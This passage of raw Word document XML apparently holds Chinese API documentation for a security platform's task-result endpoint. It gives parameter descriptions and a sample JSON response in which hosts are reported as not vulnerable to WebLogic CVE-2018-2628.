              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="497B25B4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51519058" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskRecordId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="411B61D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5284BE08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务执行id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4EAE4DFD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14623A58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>searchKeys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1764EE2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="161214A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>searchKeys为field对应参数名素组,与searchValues顺序对应</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3578D179" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FF2B329" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>searchValues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CCFF3F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00CF8DA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>searchValues为数据值, 与searchKeys的顺序对应</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7708D816" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>排序字段：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2956B416" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E477FA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F893A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/fastjob/job/task/result/5d1d61c423e46813eb98f514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3644C522" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074B78EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"field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field"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"host.displayIp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机IP"</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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"host.agentId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机ID"</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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"host.hostname"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机名"</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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"data.ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"检测的目标主机ip"</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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"data.port"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"检测的目标主机端口（默认为700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eld"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"data.vuln"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"检测结果"</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ow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data.vuln"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"不存在weblogic CVE-2018-2628 反序列化漏洞"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.146.131"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hostTagLis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ca89225d8915cedfee156"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"osTyp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tagName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server-4"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"tagColor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"#FF00FF"</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host.assetLevel"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"data.port"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"7001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.agentId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"f7869518b8e84865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hostname"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"localhost.localdomain"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hasDeleted"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"_trimmed_field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host.agentStatus"</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host.displayIp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.146.131"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"data.ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.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ata.vuln"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"不存在weblogic CVE-2018-2628 反序列化漏洞"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.ip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.167.132"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hostTagLis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ca89225d8915cedfee156"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"osTyp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tagName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server-4"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"tagColor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"#FF00FF"</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host.assetLevel"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"data.port"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"7001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.agentId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"8ed75611c5014865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"host.hostname"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
